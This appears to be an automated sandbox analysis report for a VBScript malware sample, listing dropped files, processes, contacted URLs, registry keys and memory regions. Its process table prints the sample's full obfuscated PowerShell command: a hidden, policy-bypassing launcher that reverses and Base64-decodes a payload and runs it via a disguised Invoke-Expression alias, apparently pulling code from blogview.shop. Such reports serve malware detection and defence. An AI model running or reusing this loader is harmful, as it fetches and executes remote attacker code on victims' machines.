Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
9k0s6zeaNR.vbs
|
ASCII text, with very long lines (1397), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rtbdaf3.5um.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmfwqkx3.csp.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9k0s6zeaNR.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'==Qf7kSewJHZkwyJ1g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8SNoNXZyZWZy9iN0gjM5kjNwkjMzITM3AjM1EzMx8yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://blogview.shop/api/values/13152071232906992846/refresh5/X
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://blogview.shop/api/values/13152071232906992846/refresh5/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://blogview.shop/api/values/refresh5
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop/api/values/13152071232906992846/refresh5/023861594.txt
|
unknown
|
||
|
https://blogview.shop/api/values/refresh5X
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
14528A3E000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFE7C4F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C4E0000
|
trusted library allocation
|
page read and write
|
||
|
2E955118000
|
heap
|
page read and write
|
||
|
F9493FF000
|
stack
|
page read and write
|
||
|
2E955131000
|
heap
|
page read and write
|
||
|
7FFE7C490000
|
trusted library allocation
|
page read and write
|
||
|
2E954F80000
|
heap
|
page read and write
|
||
|
10A47E000
|
stack
|
page read and write
|
||
|
14538883000
|
trusted library allocation
|
page read and write
|
||
|
2E955131000
|
heap
|
page read and write
|
||
|
14540F6E000
|
heap
|
page read and write
|
||
|
14541190000
|
heap
|
page read and write
|
||
|
2E95516E000
|
heap
|
page read and write
|
||
|
7FFE7C350000
|
trusted library allocation
|
page read and write
|
||
|
14526C90000
|
trusted library allocation
|
page read and write
|
||
|
F948EFF000
|
stack
|
page read and write
|
||
|
14526DA7000
|
heap
|
page read and write
|
||
|
1452A102000
|
trusted library allocation
|
page read and write
|
||
|
14538AFD000
|
trusted library allocation
|
page read and write
|
||
|
14540F00000
|
heap
|
page read and write
|
||
|
7FFE7C3B0000
|
trusted library allocation
|
page read and write
|
||
|
2E955080000
|
heap
|
page read and write
|
||
|
2E955060000
|
heap
|
page read and write
|
||
|
14528650000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C1B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E955115000
|
heap
|
page read and write
|
||
|
7FFE7C440000
|
trusted library allocation
|
page read and write
|
||
|
2E955131000
|
heap
|
page read and write
|
||
|
10A07E000
|
stack
|
page read and write
|
||
|
14528800000
|
heap
|
page read and write
|
||
|
7FFE7C2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C266000
|
trusted library allocation
|
page read and write
|
||
|
14540D20000
|
heap
|
page read and write
|
||
|
14526D3D000
|
heap
|
page read and write
|
||
|
145286B0000
|
trusted library allocation
|
page read and write
|
||
|
F9492FE000
|
stack
|
page read and write
|
||
|
10A1FE000
|
stack
|
page read and write
|
||
|
1452A3DA000
|
trusted library allocation
|
page read and write
|
||
|
2E9550F6000
|
heap
|
page read and write
|
||
|
14526CF4000
|
heap
|
page read and write
|
||
|
14528680000
|
trusted library allocation
|
page read and write
|
||
|
10A57D000
|
stack
|
page read and write
|
||
|
14526CB9000
|
heap
|
page read and write
|
||
|
F9491FD000
|
stack
|
page read and write
|
||
|
7FFE7C3A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C36A000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C3E0000
|
trusted library allocation
|
page read and write
|
||
|
109DA3000
|
stack
|
page read and write
|
||
|
2E9550EB000
|
heap
|
page read and write
|
||
|
10A27C000
|
stack
|
page read and write
|
||
|
7FFE7C460000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C1CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C4A0000
|
trusted library allocation
|
page read and write
|
||
|
14528D4A000
|
trusted library allocation
|
page read and write
|
||
|
10A7FE000
|
stack
|
page read and write
|
||
|
7FFE7C3F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C370000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C1B4000
|
trusted library allocation
|
page read and write
|
||
|
14526BF0000
|
heap
|
page read and write
|
||
|
145389C5000
|
trusted library allocation
|
page read and write
|
||
|
2E955111000
|
heap
|
page read and write
|
||
|
145287B0000
|
heap
|
page execute and read and write
|
||
|
7FFE7C400000
|
trusted library allocation
|
page read and write
|
||
|
2E955270000
|
heap
|
page read and write
|
||
|
14526CFC000
|
heap
|
page read and write
|
||
|
2E9550EA000
|
heap
|
page read and write
|
||
|
1454081B000
|
heap
|
page read and write
|
||
|
10B24E000
|
stack
|
page read and write
|
||
|
14540F1C000
|
heap
|
page read and write
|
||
|
14528676000
|
heap
|
page read and write
|
||
|
14526CA5000
|
heap
|
page read and write
|
||
|
109DEE000
|
stack
|
page read and write
|
||
|
7FFE7C430000
|
trusted library allocation
|
page read and write
|
||
|
2E955250000
|
heap
|
page read and write
|
||
|
14528630000
|
trusted library allocation
|
page read and write
|
||
|
2E955123000
|
heap
|
page read and write
|
||
|
2E955121000
|
heap
|
page read and write
|
||
|
7FFE7C420000
|
trusted library allocation
|
page read and write
|
||
|
10A37E000
|
stack
|
page read and write
|
||
|
14526BE0000
|
heap
|
page read and write
|
||
|
2E9550F6000
|
heap
|
page read and write
|
||
|
7FFE7C1D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C3D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C4B0000
|
trusted library allocation
|
page read and write
|
||
|
14540E20000
|
heap
|
page read and write
|
||
|
14528811000
|
trusted library allocation
|
page read and write
|
||
|
14526CB0000
|
heap
|
page read and write
|
||
|
7FFE7C260000
|
trusted library allocation
|
page read and write
|
||
|
14540D70000
|
heap
|
page execute and read and write
|
||
|
14526CA0000
|
heap
|
page read and write
|
||
|
2E95516D000
|
heap
|
page read and write
|
||
|
10A4FF000
|
stack
|
page read and write
|
||
|
2E955114000
|
heap
|
page read and write
|
||
|
7FFE7C470000
|
trusted library allocation
|
page read and write
|
||
|
14526DAC000
|
heap
|
page read and write
|
||
|
7FFE7C520000
|
trusted library allocation
|
page read and write
|
||
|
1452A225000
|
trusted library allocation
|
page read and write
|
||
|
14540F15000
|
heap
|
page read and write
|
||
|
1452A158000
|
trusted library allocation
|
page read and write
|
||
|
F948AFA000
|
stack
|
page read and write
|
||
|
2E955112000
|
heap
|
page read and write
|
||
|
14526C10000
|
heap
|
page read and write
|
||
|
14528640000
|
heap
|
page readonly
|
||
|
7FFE7C392000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C26C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C20C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C500000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C4D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C450000
|
trusted library allocation
|
page read and write
|
||
|
2E9550C0000
|
heap
|
page read and write
|
||
|
7FFE7C296000
|
trusted library allocation
|
page execute and read and write
|
||
|
10A17E000
|
stack
|
page read and write
|
||
|
14528670000
|
heap
|
page read and write
|
||
|
14528C85000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C270000
|
trusted library allocation
|
page execute and read and write
|
||
|
14540F0F000
|
heap
|
page read and write
|
||
|
14528D4E000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C1C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C410000
|
trusted library allocation
|
page read and write
|
||
|
10A3FE000
|
stack
|
page read and write
|
||
|
14526CF8000
|
heap
|
page read and write
|
||
|
10A87B000
|
stack
|
page read and write
|
||
|
2E9550E8000
|
heap
|
page read and write
|
||
|
2E9550E9000
|
heap
|
page read and write
|
||
|
14540D25000
|
heap
|
page read and write
|
||
|
7FFE7C510000
|
trusted library allocation
|
page read and write
|
||
|
14540DF7000
|
heap
|
page execute and read and write
|
||
|
10A5FE000
|
stack
|
page read and write
|
||
|
10A2FF000
|
stack
|
page read and write
|
||
|
7FFE7C361000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7C480000
|
trusted library allocation
|
page read and write
|
||
|
14540DF0000
|
heap
|
page execute and read and write
|
||
|
14528C40000
|
trusted library allocation
|
page read and write
|
||
|
10A6FE000
|
stack
|
page read and write
|
||
|
14526C50000
|
heap
|
page read and write
|
||
|
7DF4EE0B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7C4C0000
|
trusted library allocation
|
page read and write
|
||
|
2E955110000
|
heap
|
page read and write
|
||
|
7FFE7C1B2000
|
trusted library allocation
|
page read and write
|
||
|
1452A37A000
|
trusted library allocation
|
page read and write
|
||
|
10A67E000
|
stack
|
page read and write
|
||
|
7FFE7C3C0000
|
trusted library allocation
|
page read and write
|
||
|
1453881F000
|
trusted library allocation
|
page read and write
|
||
|
F948FFF000
|
stack
|
page read and write
|
||
|
1452A150000
|
trusted library allocation
|
page read and write
|
||
|
10A0FD000
|
stack
|
page read and write
|
||
|
F948BFE000
|
stack
|
page read and write
|
||
|
14540F6B000
|
heap
|
page read and write
|
||
|
1452974E000
|
trusted library allocation
|
page read and write
|
||
|
14526CF0000
|
heap
|
page read and write
|
||
|
14528895000
|
trusted library allocation
|
page read and write
|
||
|
2E955275000
|
heap
|
page read and write
|
||
|
14526D38000
|
heap
|
page read and write
|
||
|
14538811000
|
trusted library allocation
|
page read and write
|
||
|
1452A25A000
|
trusted library allocation
|
page read and write
|
||
|
1452A21E000
|
trusted library allocation
|
page read and write
|
||
|
F948CFE000
|
stack
|
page read and write
|
||
|
14526D10000
|
heap
|
page read and write
|
||
|
14529E68000
|
trusted library allocation
|
page read and write
|
||
|
1452A1AC000
|
trusted library allocation
|
page read and write
|
||
|
14540C60000
|
heap
|
page read and write
|
||
|
7FFE7C380000
|
trusted library allocation
|
page execute and read and write
|
||
|
14540F2C000
|
heap
|
page read and write
|
||
|
7FFE7C1BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E956E50000
|
heap
|
page read and write
|
||
|
F9494FB000
|
stack
|
page read and write
|
||
|
14540CAA000
|
heap
|
page read and write
|
There are 158 hidden memdumps, click here to show them.